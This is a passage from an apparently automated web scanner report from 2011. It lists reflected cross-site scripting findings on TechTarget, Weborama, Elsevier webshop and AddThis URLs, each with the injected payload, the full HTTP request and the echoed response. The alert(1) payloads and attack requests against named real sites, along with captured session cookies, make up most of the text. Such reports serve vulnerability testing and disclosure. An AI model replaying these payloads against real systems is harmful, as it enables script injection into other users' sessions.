jsonp13043924108804e760<script>alert(1)</script>c08eaae6482("FGN|");

4.11. http://go.techtarget.com//clicktrack-r/activity/a [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   //clicktrack-r/activity/a

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload debe2<img%20src%3da%20onerror%3dalert(1)>3afc08da00f was submitted in the REST URL parameter 3. This input was echoed as debe2<img src=a onerror=alert(1)>3afc08da00f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET //clicktrack-r/activity/adebe2<img%20src%3da%20onerror%3dalert(1)>3afc08da00f HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://go.techtarget.com//clicktrack-r/activity/activity.gif6461a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eceb055b54ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; ugcCltHeight=; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=6923530019505823043; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087%2Ct1@2240031635%24_2011-05-02%2021%3A31%3A20%26g%3D212695; __utmv=; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:46:28 GMT
Content-Length: 452

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</h1>
...[SNIP]...

4.12. http://go.techtarget.com//clicktrack-r/activity/activity.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   //clicktrack-r/activity/activity.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca was submitted in the REST URL parameter 3. This input was echoed as 6461a<img src=a onerror=alert(1)>ceb055b54ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET //clicktrack-r/activity/activity.gif6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 02 May 2011 22:25:49 GMT
Content-Length: 1327

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</h1>
...[SNIP]...

4.13. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /activity/activity.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload afbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 was submitted in the REST URL parameter 2. This input was echoed as afbcf<img src=a onerror=alert(1)>3250be4ac70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /activity/activity.gifafbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response (redirected)

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 02 May 2011 22:26:01 GMT
Content-Length: 1322

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</h1>
...[SNIP]...

4.14. http://go.techtarget.com/clicktrack-r/activity/a [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /clicktrack-r/activity/a

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52d48<img%20src%3da%20onerror%3dalert(1)>9a5a459849d was submitted in the REST URL parameter 3. This input was echoed as 52d48<img src=a onerror=alert(1)>9a5a459849d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /clicktrack-r/activity/a52d48<img%20src%3da%20onerror%3dalert(1)>9a5a459849d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: go.techtarget.com

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:46:32 GMT
Content-Length: 1293

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</h1>
...[SNIP]...

4.15. http://go.techtarget.com/clicktrack-r/activity/activity.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   /clicktrack-r/activity/activity.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d was submitted in the REST URL parameter 3. This input was echoed as 11f14<img src=a onerror=alert(1)>973664cfb2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /clicktrack-r/activity/activity.gif11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d HTTP/1.1
Host: go.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;

Response

HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 02 May 2011 22:25:50 GMT
Content-Length: 1326

<html>
<head><title>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</title></head>
<body>
<h1>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</h1>
...[SNIP]...

4.16. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 73271<script>alert(1)</script>85f49d12bf0 was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=27843&clicktag=[URLTRACKING]73271<script>alert(1)</script>85f49d12bf0&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AFFICHE_W=aSnSXc2yol9n80

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:20 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VG4DuWab; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:04:35 GMT
Set-Cookie: _adpp=VG4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:04:35 GMT
Set-Cookie: _adpe=VG60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:04:35 GMT
Set-Cookie: _advcrea=6@|bm|a:b; domain=.ieo.solution.weborama.fr; path=/; expires=Thu, 11-Aug-2011 04:04:35 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3514

window['wbo_params'] = {
id: 76,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]73271<script>alert(1)</script>85f49d12bf0http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=76&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',

...[SNIP]...

4.17. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 1f911<script>alert(1)</script>751eacaf9bd was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]1f911<script>alert(1)</script>751eacaf9bd&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3514

window['wbo_params'] = {
id: 46,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]1f911<script>alert(1)</script>751eacaf9bdhttp://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=46&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',

...[SNIP]...

4.18. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d4392<script>alert(1)</script>33066bb2dad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=27843&clicktag=[URLTRACKING]&rnd=[RANDOM]&d4392<script>alert(1)</script>33066bb2dad=1 HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AFFICHE_W=aSnSXc2yol9n80

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VG4DuWab; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:03:35 GMT
Set-Cookie: _adpp=VG4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:03:35 GMT
Set-Cookie: _adpe=VG60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sat, 02-Jul-2011 04:03:35 GMT
Set-Cookie: _advcrea=6@|b0|a:b; domain=.ieo.solution.weborama.fr; path=/; expires=Thu, 11-Aug-2011 04:03:35 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3686

window['wbo_params'] = {
id: 116,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]&rnd=[RANDOM]&d4392<script>alert(1)</script>33066bb2dad=1http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=116&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank'
...[SNIP]...

4.19. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2a192<script>alert(1)</script>ef25b6f5bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM]&2a192<script>alert(1)</script>ef25b6f5bf6=1 HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:39 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3669

window['wbo_params'] = {
id: 96,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]&rnd=[RANDOM]&2a192<script>alert(1)</script>ef25b6f5bf6=1http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=96&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
...[SNIP]...

4.20. http://webshop.elsevier.com/forgotpassword.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webshop.elsevier.com
Path:   /forgotpassword.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd172"><script>alert(1)</script>0b5c9abc8b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1 HTTP/1.1
Host: webshop.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=76495853; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; CFID=1230652; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; __utmb=84352454.1.10.1304389900;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:33:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="forgotPasswordForm" id="forgotPasswordForm" action="/redirect.cfm?404;http://webshop.elsevier.com:80/forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1" method="post" class="logincontainer" onsubmit="return _CF_checkforgotPasswordForm(this)">
...[SNIP]...

4.21. https://webshop.elsevier.com/login.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://webshop.elsevier.com
Path:   /login.cfm

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252f0"><script>alert(1)</script>79e7f504dc5 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E252f0"><script>alert(1)</script>79e7f504dc5 HTTP/1.1
Host: webshop.elsevier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:51:44 GMT
Content-Length: 13461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="loginForm" id="loginForm" action="/login.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E252f0"><script>alert(1)</script>79e7f504dc5" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">
...[SNIP]...

4.22. https://webshop.elsevier.com/login.cfm [d46 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://webshop.elsevier.com
Path:   /login.cfm

Issue detail

The value of the d46 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88da4"><script>alert(1)</script>91d57d817b5 was submitted in the d46 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.cfm?d4688da4"><script>alert(1)</script>91d57d817b5 HTTP/1.1
Host: webshop.elsevier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:51:23 GMT
Content-Length: 13277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="loginForm" id="loginForm" action="/login.cfm?d4688da4"><script>alert(1)</script>91d57d817b5" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">
...[SNIP]...

4.23. https://webshop.elsevier.com/login.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://webshop.elsevier.com
Path:   /login.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e2"><script>alert(1)</script>03772b18c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.cfm?d46e2"><script>alert(1)</script>03772b18c61=1 HTTP/1.1
Host: webshop.elsevier.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D02%2000%3A00%3A00%27%7D; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; __utmb=84352454.1.10.1304389900

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:27:41 GMT
Content-Length: 13277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...
<form name="loginForm" id="loginForm" action="/login.cfm?d46e2"><script>alert(1)</script>03772b18c61=1" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">
...[SNIP]...

4.24. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31df3"-alert(1)-"249e5036cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php31df3"-alert(1)-"249e5036cfd HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=m9ica98kbm5dt73tgro89dvv23; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php31df3"-alert(1)-"249e5036cfd";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

4.25. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

